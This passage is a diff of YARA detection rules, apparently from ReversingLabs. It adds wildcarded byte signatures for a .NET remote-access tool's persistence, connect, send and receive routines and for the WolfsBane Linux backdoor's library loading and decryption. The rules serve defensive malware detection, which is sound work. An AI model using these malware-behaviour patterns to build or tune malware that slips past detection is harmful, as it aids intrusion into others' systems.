+        ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ??
+        7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 7E
+        ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 7E ??
+        ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 7E ?? ?? ??
+        ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 25 28 ?? ?? ?? ?? 13
+        ?? 00 28 ?? ?? ?? ?? DE ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 16 80 ?? ?? ?? ?? 28
+        ?? ?? ?? ?? DE ?? 00 00 DE ?? 11 ?? 28 ?? ?? ?? ?? 00 DC 7E ?? ?? ?? ?? 0A 2B ?? 06
+    }
+		$send_v1 = {
+        00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 16 0A 38 ?? ?? ?? ?? 00 00 7E ??
+        ?? ?? ?? 0B 00 07 13 ?? 11 ?? 28 ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13
+        ?? 11 ?? 2C ?? 16 0A DD ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 13 ?? 02 8E B7 0D 12 ?? 28 ??
+        ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 0C 11 ?? 08 16 08
+        8E B7 6F ?? ?? ?? ?? 00 11 ?? 02 16 02 8E B7 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ??
+        ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 16 11 ?? 6F ?? ?? ?? ?? B7 16 6F ?? ?? ?? ?? 26 00 DE
+        ?? 11 ?? 28 ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 11 ?? 28 ?? ?? ?? ??
+        00 11 ?? 13 ?? 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 16 80 ?? ?? ?? ?? 7E ?? ?? ?? ??
+        6F ?? ?? ?? ?? 00 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 28 ??
+        ?? ?? ?? DE ?? 00 7E ?? ?? ?? ?? 0A 2B ?? 06
+    }
+		$receive_v1_p1 = {
+        00 00 00 72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ??
+        13 ?? 11 ?? 39 ?? ?? ?? ?? 15 6A 0A 16 0B 00 00 00 07 17 D6 0B 07 1F ?? (FE | 01) ??
+        13 ?? 11 ?? 2C ?? 16 0B 17 28 ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13 ??
+        11 ?? 2C ?? 00 DD ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 (FE | 04) ?? 13 ??
+        11 ?? 2C ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 15 16 6F ?? ?? ?? ?? 26 00 00 00 7E ?? ??
+        ?? ?? 6F ?? ?? ?? ?? 16 (FE | 02) ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 06 15 6A (FE | 01) ??
+        13 ?? 11 ?? 39 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ??
+        ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 00 11 ?? 15 59 13 ?? 11 ?? 45 ?? ?? ?? ?? ?? ?? ?? ??
+        ?? ?? ?? ?? 2B ?? 00 00 DD ?? ?? ?? ?? 2B ?? 00 11 ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ??
+        ?? 13 ?? 06 16 6A (FE | 01) ?? 13 ?? 11 ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 15
+        6A 0A 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 (FE | 02) ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C
+        ?? 38 ?? ?? ?? ?? 00 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ??
+        ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 00 17 13 ?? 11 ?? 3A ??
+        ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 D6 17 DA 17 D6 8D ?? ?? ?? ?? 80 ?? ??
+        ?? ?? 06 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DA 0D 7E ?? ?? ?? ?? 8E B7 6A 09 (FE | 02)
+    }
+		$receive_v1_p2 = {
+        13 ?? 11 ?? 2C ?? 09 17 6A DA B7 17 D6 17 DA 17 D6 8D ?? ?? ?? ?? 80 ?? ?? ?? ?? 00
+        7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E B7 16 6F ?? ?? ??
+        ?? 0C 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 08 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ??
+        ?? ?? 06 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 15 6A 0A 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ??
+        ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
+        11 ?? 1F ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 80 ??
+        ?? ?? ?? 00 38 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ??
+        00 00 00 00 00 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 7E ??
+        ?? ?? ?? 28 ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 14 14 14 17 28 ?? ?? ??
+        ?? 26 14 80 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00
+        16 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 2B ?? 00 17 80 ??
+        ?? ?? ?? 38 ?? ?? ?? ?? 00
+    }
+		$connect_v2 = {
+        16 80 ?? ?? ?? ?? 20 D0 07 00 00 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 0A 06 25 13 ?? 28 ??
+        ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 14 80 ?? ?? ?? ?? DE ??
+        26 DE ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? DE ?? 26 DE ?? 73 ?? ?? ?? ??
+        80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ??
+        ?? ?? 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20
+        10 27 00 00 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ??
+        ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 80
+        ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 72 ??
+        ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 07 7F ?? ?? ?? ?? 28
+        ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 2B ?? 07 0C 72 ?? ?? ?? ?? 72 ?? ?? ??
+        ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 08 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ??
+        ?? ?? 0B 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 07 A2 11 ?? 17 7E ?? ?? ?? ?? A2 11 ?? 18
+        72 ?? ?? ?? ?? A2 11 ?? 19 7E ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 28 ??
+        ?? ?? ?? 0B 07 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 7E
+        ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ??
+        ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B
+        07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 12 ?? 28 ?? ?? ??
+        ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? DE ?? 26 16 80 ?? ?? ?? ?? DE ??
+        DE ?? 11 ?? 28 ?? ?? ?? ?? DC 7E
+    }
+		$receive_v2 = {
+        72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 15 6A 0A 16 0B 07 17 D6
+        0B 07 1F ?? 33 ?? 16 0B 17 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 7E ?? ?? ??
+        ?? 6F ?? ?? ?? ?? 17 3C ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 15 16 6F ?? ?? ??
+        ?? 26 38 ?? ?? ?? ?? 06 15 6A 3B ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 D6 8D
+        ?? ?? ?? ?? 80 ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DA 0C 7E ?? ?? ?? ?? 8E
+        69 6A 08 31 ?? 08 17 6A DA B7 17 D6 8D ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F
+        ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E 69 16 6F ?? ?? ?? ?? 0D 7E ?? ?? ??
+        ?? 7E ?? ?? ?? ?? 16 09 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 40 ?? ?? ??
+        ?? 15 6A 0A 7E ?? ?? ?? ?? 2D ?? 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ??
+        ?? ?? 7E ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
+        ?? ?? ?? ?? 11 ?? 1F ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ??
+        ?? 80 ?? ?? ?? ?? 38 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ??
+        6F ?? ?? ?? ?? 13 ?? 11 ?? 15 2E ?? 11 ?? 2C ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 12
+        ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 28
+        ?? ?? ?? ?? 0A 06 16 6A 33 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 15 6A 0A 7E ?? ?? ??
+        ?? 6F ?? ?? ?? ?? 16 3E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? DE
+        ?? 26 DE ?? 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ??
+        14 14 14 17 28 ?? ?? ?? ?? 26 14 80 ?? ?? ?? ?? DE ?? 26 DE ?? 16 80 ?? ?? ?? ?? 28
+        ?? ?? ?? ?? 2C ?? 17 80
+    }
+		$get_system_information_v2_p1 = {
+        72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
+        ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 06 0B 7F ?? ?? ?? ?? 28 ?? ?? ?? ??
+        72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 07 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
+        ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 0D 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ??
+        ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
+        ?? 09 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 13 ?? 28 ??
+        ?? ?? ?? 13 ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06
+        28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 7E ?? ??
+        ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE
+        ?? 26 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06 7E ?? ?? ?? ?? 6F
+        ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E
+        ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ??
+        ?? 0A DE ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 28
+        ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 28 ?? ?? ??
+        ?? 0A DE ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ??
+        ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 33 ?? 06 72 ?? ?? ?? ?? 28 ?? ??
+        ?? ?? 0A 06 11 ?? 11 ?? 8E 69 17 DA 9A 28 ?? ?? ?? ?? 0A DE ?? 26 06 72
+    }
+		$get_system_information_v2_p2 = {
+        28 ?? ?? ?? ?? 0A DE ?? 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 06
+        72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ??
+        ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 28 ?? ?? ??
+        ?? 2C ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 72 ?? ?? ?? ??
+        7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A
+        06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 7E ?? ?? ?? ??
+        28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ??
+        28 ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A
+        13 ?? 11 ?? 6F ?? ?? ?? ?? 1F ?? 33 ?? 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
+        ?? 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 06 11 ?? 28
+    }
+		$send_v2 = {
+        7E ?? ?? ?? ?? 2D ?? 16 2A 7E ?? ?? ?? ?? 0A 06 25 13 ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
+        ?? 2D ?? 16 13 ?? DD ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 02 8E 69 13 ?? 12 ?? 28 ?? ?? ??
+        ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 12 ?? 28 ?? ?? ?? ?? 0D 07 09 16 09 8E 69 6F ??
+        ?? ?? ?? 07 02 16 02 8E 69 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 6F ?? ??
+        ?? ?? 16 07 6F ?? ?? ?? ?? B7 16 6F ?? ?? ?? ?? 26 07 6F ?? ?? ?? ?? DE ?? 11 ?? 28
+        ?? ?? ?? ?? DC DE ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 16 80 ?? ?? ??
+        ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 28 ?? ?? ?? ?? DE ?? 7E ?? ?? ?? ??
+        2A 11
+    }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEHANIKUM OOO" and ( pe.signatures [ i ] . serial == "00:f3:60:f7:ad:0e:d0:65:fe:c0:b4:4f:98:e0:44:81:a0" or pe.signatures [ i ] . serial == "f3:60:f7:ad:0e:d0:65:fe:c0:b4:4f:98:e0:44:81:a0" ) and 1599031121 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( all of ( $persistence_mechanism_v1_p* ) ) and ( all of ( $connect_v1_p* ) ) and ( $send_v1 ) and ( all of ( $receive_v1_p* ) ) ) or ( ( $connect_v2 ) and ( $receive_v2 ) and ( all of ( $get_system_information_v2_p* ) ) and ( $send_v2 ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Fe41941464B9992A69B7317418Ae8Eb7 : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Wolfsbane : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects WolfsBane backdoor."
 		author = "ReversingLabs"
-		id = "dd84a6b2-e616-5f93-af50-1a4fc15f3c45"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "07b96e74-8ad1-5400-a23c-c14fea78ecdd"
+		date = "2025-03-17"
+		modified = "2025-03-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5444-L5462"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.WolfsBane.yara#L1-L124"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bd5131f2b44deec6a7a68577b80ef4d066c331da2976539ce52ac6cff8d5560e"
+		logic_hash = "c2bc992375bfa989c2a18a52e09c551cd6dfefda8fb96e7af4dabfead76e784f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "WolfsBane"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$load_embedded_library = {
+            41 57 41 56 41 55 41 54 49 89 FC 55 53 48 89 F3 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48
+            C7 47 ?? ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 48 C7 47 ?? ?? ?? ?? ?? 48 C7 47 ?? ?? ??
+            ?? ?? C7 47 ?? ?? ?? ?? ?? 48 83 C0 ?? 48 C7 47 ?? ?? ?? ?? ?? 48 89 07 48 8D 47 ??
+            48 89 47 ?? 48 89 47 ?? 48 8D 47 ?? 48 89 47 ?? 48 89 47 ?? 48 8B 06 48 39 46 ?? 0F
+            84 ?? ?? ?? ?? 4C 8B 3D ?? ?? ?? ?? BF ?? ?? ?? ?? 49 89 E5 49 8D 47 ?? 48 89 44 24
+            ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 89 58 ?? 48 8B 1D ?? ?? ?? ?? 48 C7 40 ??
+            ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 89 44 24 ?? 48 83 C2 ?? 48 89 44 24 ?? 48 C7 44
+            24 ?? ?? ?? ?? ?? 48 89 10 48 8D 43 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ??
+            ?? ?? ?? 48 89 04 24 48 8D 43 ?? 48 89 44 24 ?? 48 89 E0 48 03 03 48 8B 50 ?? 48 39
+            50 ?? 0F 84 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 4C 8D 74 24 ?? 48 8D 54 24 ?? 4C 89 F7
+            48 8B 70 ?? 31 C0 80 3E ?? 0F 94 C0 48 01 C6 E8 ?? ?? ?? ?? 48 8B 04 24 4C 89 ED 48
+            03 68 ?? 48 8B 7D ?? 48 3B 7D ?? 0F 84 ?? ?? ?? ?? 48 85 FF 0F 84 ?? ?? ?? ?? 4C 89
+            F6 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 45 ?? 4C 89 F7 E8 ?? ?? ?? ?? 48 8D
+            43 ?? 48 8B 7C 24 ?? 48 89 04 24 49 8D 47 ?? 48 85 FF 48 89 44 24 ?? 74 ?? 48 8B 07
+            FF 50 ?? 48 8B 6C 24 ?? 48 8B 5C 24 ?? 48 39 DD 74 ?? 66 0F 1F 44 00 ?? 48 89 DF E8
+            ?? ?? ?? ?? 48 83 C3 ?? 48 39 DD 75 ?? 48 8B 6C 24 ?? 48 85 ED 74 ?? 48 89 EF E8 ??
+            ?? ?? ?? 48 83 C4 ?? 4C 89 E0 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
+		$decrypt_embedded_library_1 = {
+            41 57 41 56 41 55 41 54 55 48 89 F5 53 48 89 FB 48 81 EC ?? ?? ?? ?? 48 8B 77 ?? 48
+            8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 C7 48 89 44 24 ?? E8 ?? ?? ?? ??
+            48 8B 84 24 ?? ?? ?? ?? 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 39 45 ?? 0F
+            84 ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ??
+            4C 89 E7 E8 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 8B 74 24 ?? 4C 89 E2 48 89 C7 48
+            89 44 24 ?? E8 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 39 84
+            24 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 4C 8D BC
+            24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ??
+            ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 83 C0 ?? 48 83 C2 ?? 48 89 84 24 ?? ?? ??
+            ?? 48 89 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 4C 8B 23 48 89 94 24 ?? ?? ?? ??
+            4C 89 E7 E8 ?? ?? ?? ?? 49 8D 7F ?? 48 89 C2 4C 89 E6 E8 ?? ?? ?? ?? 4C 8B 63 ?? 4C
+            89 E7 E8 ?? ?? ?? ?? 49 8D 7F ?? 48 89 C2 4C 89 E6 E8 ?? ?? ?? ?? 48 8B 5B ?? 48 89
+            DF E8 ?? ?? ?? ?? 49 8D 7F ?? 48 89 C2 48 89 DE E8 ?? ?? ?? ?? 49 8D 7F ?? 48 89 EE
+            E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 4C 89 FE 48 C7 84 24
+            ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 DF 48 C7 84 24 ??
+            ?? ?? ?? ?? ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 DE
+            48 89 C7 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 85 FF 74 ?? E8 ??
+            ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 89
+            C7 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 C7 48 89 44 24 ?? E8
+        }
+		$decrypt_embedded_library_2 = {
+            48 8D 7C 24 ?? 49 89 F9 0F 1F 84 00 ?? ?? ?? ?? 89 CA 89 C8 83 C1 ?? C1 FA ?? F7 FB
+            48 63 D2 0F B6 04 16 41 88 01 49 83 C1 ?? 81 F9 ?? ?? ?? ?? 75 ?? 48 8D B5 ?? ?? ??
+            ?? 48 89 E8 31 D2 66 90 0F B6 18 44 0F B6 0F 48 83 C7 ?? 0F B6 CB 41 8D 0C 09 8D 14
+            11 41 89 D3 41 C1 FB ?? 41 C1 EB ?? 44 01 DA 81 E2 ?? ?? ?? ?? 44 29 DA 48 63 CA 83
+            C2 ?? 44 0F B6 8C 0C ?? ?? ?? ?? 44 88 08 48 83 C0 ?? 88 9C 0C ?? ?? ?? ?? 48 39 F0
+            75 ?? 4D 29 C2 45 85 D2 0F 8E ?? ?? ?? ?? 41 83 EA ?? 31 C0 31 D2 4F 8D 54 10 ?? 66
+            0F 1F 84 00 ?? ?? 00 00 83 C2 ?? 89 D1 C1 F9 ?? C1 E9 ?? 01 CA 81 E2 ?? ?? ?? ?? 29
+            CA 48 63 CA 83 C2 ?? 0F B6 BC 0C ?? ?? ?? ?? 40 0F B6 DF 8D 04 03 89 C6 C1 FE ?? C1
+            EE ?? 01 F0 25 ?? ?? ?? ?? 29 F0 48 63 F0 83 C0 ?? 44 0F B6 8C 34 ?? ?? ?? ?? 44 88
+            8C 0C ?? ?? ?? ?? 40 88 BC 34 ?? ?? ?? ?? 02 9C 0C ?? ?? ?? ?? 0F B6 DB 0F B6 8C 1C
+            ?? ?? ?? ?? 41 30 08 49 83 C0 ?? 4D 39 D0 75 ?? B9 ?? ?? ?? ?? 31 C0 48 89 EF F3 48
+            AB 48 8B BC 24 ?? ?? ?? ?? 48 85 FF 74 ?? E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48
+            8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48
+            8B 84 24 ?? ?? ?? ?? 48 29 F8 48 C1 F8 ?? 48 83 F8 ?? 74 ?? 48 8B BC 24 ?? ?? ?? ??
+            48 85 FF 74 ?? E8 ?? ?? ?? ?? 4C 89 FF E8 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ??
+            48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
+		$remove_backdoor_p1 = {
+            41 57 48 8D 35 ?? ?? ?? ?? 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24
